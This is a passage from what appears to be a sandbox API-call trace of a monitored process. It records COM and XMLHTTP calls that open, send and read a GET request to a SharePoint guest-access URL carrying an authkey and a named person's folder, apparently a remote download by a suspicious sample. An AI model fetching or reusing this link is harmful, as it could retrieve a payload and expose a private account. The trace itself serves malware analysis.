[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c640 | out: ppvObject=0x18c640*=0x0) returned 0x80004002 [0018.318] IUnknown:AddRef (This=0x495c80) returned 0x2 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef3768070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c820 | out: ppvObject=0x18c820*=0x495c80) returned 0x0 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18b640 | out: ppvObject=0x18b640*=0x495c80) returned 0x0 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef37708d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef3759ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18b678 | out: ppvObject=0x18b678*=0x0) returned 0x80004002 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef3770870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18b668 | out: ppvObject=0x18b668*=0x0) returned 0x80004002 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18b638 | out: ppvObject=0x18b638*=0x0) returned 0x80004002 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18b638 | out: ppvObject=0x18b638*=0x0) returned 0x80004002 [0018.318] IUnknown:Release (This=0x495c80) returned 0x3 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef376bbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x18b718 | out: ppvObject=0x18b718*=0x0) returned 0x80004002 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18b728 | out: ppvObject=0x18b728*=0x0) returned 0x80004002 [0018.318] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18b710 | out: ppvObject=0x18b710*=0x495c80) returned 0x0 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef37708d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef3759ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18b740 | out: ppvObject=0x18b740*=0x0) returned 0x80004002 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef376bbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x18b718 | out: ppvObject=0x18b718*=0x0) returned 0x80004002 [0018.318] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18b720 | out: ppvObject=0x18b720*=0x0) returned 0x80004002 [0018.319] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18b720 | out: ppvObject=0x18b720*=0x0) returned 0x80004002 [0018.319] IUnknown:Release (This=0x495c80) returned 0x3 [0018.319] IUnknown:Release (This=0x495c80) returned 0x2 [0018.319] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18c838 | out: ppvObject=0x18c838*=0x495c80) returned 0x0 [0018.319] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x18c830 | out: ppvObject=0x18c830*=0x0) returned 0x80004002 [0018.319] IUnknown:Release (This=0x495c80) returned 0x2 [0018.319] IUnknown:Release (This=0x58e5b08) returned 0x0 [0018.319] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef3086370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c898 | out: ppvObject=0x18c898*=0x0) returned 0x80004002 [0018.319] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef3086518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c810 | out: ppvObject=0x18c810*=0x0) returned 0x80004002 [0018.319] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef30864f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c818 | out: ppvObject=0x18c818*=0x0) returned 0x80004002 [0018.319] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef3086508*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x18c820 | out: ppvObject=0x18c820*=0x0) returned 0x80004002 [0018.320] IUnknown:QueryInterface (in: This=0x58e5aa0, riid=0x7fef3086340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c828 | out: ppvObject=0x18c828*=0x58e5aa0) returned 0x0 [0018.320] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0018.320] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="open", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=1) returned 0x0 [0018.327] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0018.328] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=1, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x406d600000000000, varVal2=0x0), [1]=0x18c838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://moranaccountants-my.sharepoint.com/personal/lily_moranaccountants_com_au/_layouts/15/guestaccess.aspx?docid=03559bd7bd473450fab4c679cae4be913&authkey=AXWiRPNRVvwj9BsVKKyrAsc&e=259ca72ab9534857b5c3964310916b09", varVal2=0x0), [2]=0x18c850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x6164020)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=([0]=0x18c820*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x406d600000000000, varVal2=0x0), [1]=0x18c838*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="https://moranaccountants-my.sharepoint.com/personal/lily_moranaccountants_com_au/_layouts/15/guestaccess.aspx?docid=03559bd7bd473450fab4c679cae4be913&authkey=AXWiRPNRVvwj9BsVKKyrAsc&e=259ca72ab9534857b5c3964310916b09", varVal2=0x0), [2]=0x18c850*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="GET", varVal2=0x6164020)), rgdispidNamedArgs=0x0, cArgs=0x3, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x57fe) returned 0x0 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fefe71d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18bd28 | out: ppvObject=0x18bd28*=0x0) returned 0x80004002 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fefe6f6f70*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18bd30 | out: ppvObject=0x18bd30*=0x0) returned 0x80004002 [0018.585] IUnknown:AddRef (This=0x495c80) returned 0x2 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef3768070*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18bf10 | out: ppvObject=0x18bf10*=0x495c80) returned 0x0 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18ad30 | out: ppvObject=0x18ad30*=0x495c80) returned 0x0 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef37708d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef3759ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ad68 | out: ppvObject=0x18ad68*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), riid=0x7fef3770870*(Data1=0xfc4801a1, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x18ad58 | out: ppvObject=0x18ad58*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ad28 | out: ppvObject=0x18ad28*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ad28 | out: ppvObject=0x18ad28*=0x0) returned 0x80004002 [0018.585] IUnknown:Release (This=0x495c80) returned 0x3 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef376bbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x18ae08 | out: ppvObject=0x18ae08*=0x0) returned 0x80004002 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708c0*(Data1=0x118, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ae18 | out: ppvObject=0x18ae18*=0x0) returned 0x80004002 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18ae00 | out: ppvObject=0x18ae00*=0x495c80) returned 0x0 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef37708d0*(Data1=0x75dd09cb, Data2=0x6c40, Data3=0x11d5, Data4=([0]=0x85, [1]=0x43, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xa0, [6]=0xfb, [7]=0xa3)), riid=0x7fef3759ee8*(Data1=0xc, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18ae30 | out: ppvObject=0x18ae30*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef376bbe0*(Data1=0x2933bf81, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppvObject=0x18ae08 | out: ppvObject=0x18ae08*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770890*(Data1=0xb722be00, Data2=0x4e68, Data3=0x101b, Data4=([0]=0xa2, [1]=0xbc, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x40, [6]=0x47, [7]=0x70)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ae10 | out: ppvObject=0x18ae10*=0x0) returned 0x80004002 [0018.585] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef37708b0*(Data1=0x332c4425, Data2=0x26cb, Data3=0x11d0, Data4=([0]=0xb4, [1]=0x83, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd9, [6]=0x1, [7]=0x19)), ppvObject=0x18ae10 | out: ppvObject=0x18ae10*=0x0) returned 0x80004002 [0018.585] IUnknown:Release (This=0x495c80) returned 0x3 [0018.585] IUnknown:Release (This=0x495c80) returned 0x2 [0018.585] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18bf28 | out: ppvObject=0x18bf28*=0x495c80) returned 0x0 [0018.586] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), riid=0x7fef3770880*(Data1=0x3af280b6, Data2=0xcb3f, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xb6, [6]=0xbf, [7]=0xc4)), ppvObject=0x18bf20 | out: ppvObject=0x18bf20*=0x0) returned 0x80004002 [0018.586] IUnknown:Release (This=0x495c80) returned 0x2 [0018.586] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0018.586] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18ca70*="send", cNames=0x1, lcid=0x409, rgDispId=0x18c920 | out: rgDispId=0x18c920*=5) returned 0x0 [0018.586] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0018.586] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=5, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x1, pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0, puArgErr=0x18c7a4 | out: pDispParams=0x18c808*(rgvarg=0x2bbce8, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x18c7b0*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c7a4*=0x57fe) returned 0x0 [0018.591] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18be58 | out: ppvObject=0x18be58*=0x495c80) returned 0x0 [0018.592] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fefd187e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), riid=0x7fefd187e20*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x953b6d8 | out: ppvObject=0x953b6d8*=0x0) returned 0x80004002 [0018.592] IUnknown:Release (This=0x495c80) returned 0x2 [0018.765] IUnknown:QueryInterface (in: This=0x495c80, riid=0x7fef37708a0*(Data1=0x6d5140c1, Data2=0x7436, Data3=0x11ce, Data4=([0]=0x80, [1]=0x34, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x60, [6]=0x9, [7]=0xfa)), ppvObject=0x18a958 | out: ppvObject=0x18a958*=0x495c80) returned 0x0 [0018.765] IServiceProvider:QueryService (in: This=0x495c80, guidService=0x7fefd18f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), riid=0x7fefd18f170*(Data1=0x4f9f9fcb, Data2=0xe0f4, Data3=0x48eb, Data4=([0]=0xb7, [1]=0xab, [2]=0xfa, [3]=0x2e, [4]=0xa9, [5]=0x36, [6]=0x5c, [7]=0xb4)), ppvObject=0x953d1d8 | out: ppvObject=0x953d1d8*=0x0) returned 0x80004002 [0018.765] IUnknown:Release (This=0x495c80) returned 0x2 [0034.643] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0034.643] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="readystate", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=13) returned 0x0 [0034.644] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0034.644] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=13, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbce8, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbce8*(varType=0x3, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x2bb210), pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x57fe) returned 0x0 [0034.644] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0034.657] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="statusText", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=8) returned 0x0 [0034.657] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0034.657] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=8, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbcd0, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbcd0*(varType=0x8, wReserved1=0x18, wReserved2=0x0, wReserved3=0x0, varVal1="OK", varVal2=0x2bb210), pExcepInfo=0x18c820*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18c814*=0x57fe) returned 0x0 [0034.657] IUnknown:Release (This=0x58e5aa0) returned 0x1 [0034.658] GetTickCount () returned 0x18516 [0034.670] IDispatch:GetIDsOfNames (in: This=0x58e5aa0, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x18cae0*="responseText", cNames=0x1, lcid=0x409, rgDispId=0x18c990 | out: rgDispId=0x18c990*=10) returned 0x0 [0034.670] IUnknown:AddRef (This=0x58e5aa0) returned 0x2 [0034.671] IDispatch:Invoke (in: This=0x58e5aa0, dispIdMember=10, riid=0x7fef3086360*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2bbcd0, pExcepInfo=0x18c820, puArgErr=0x18c814 | out: pDispParams=0x18c878*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), 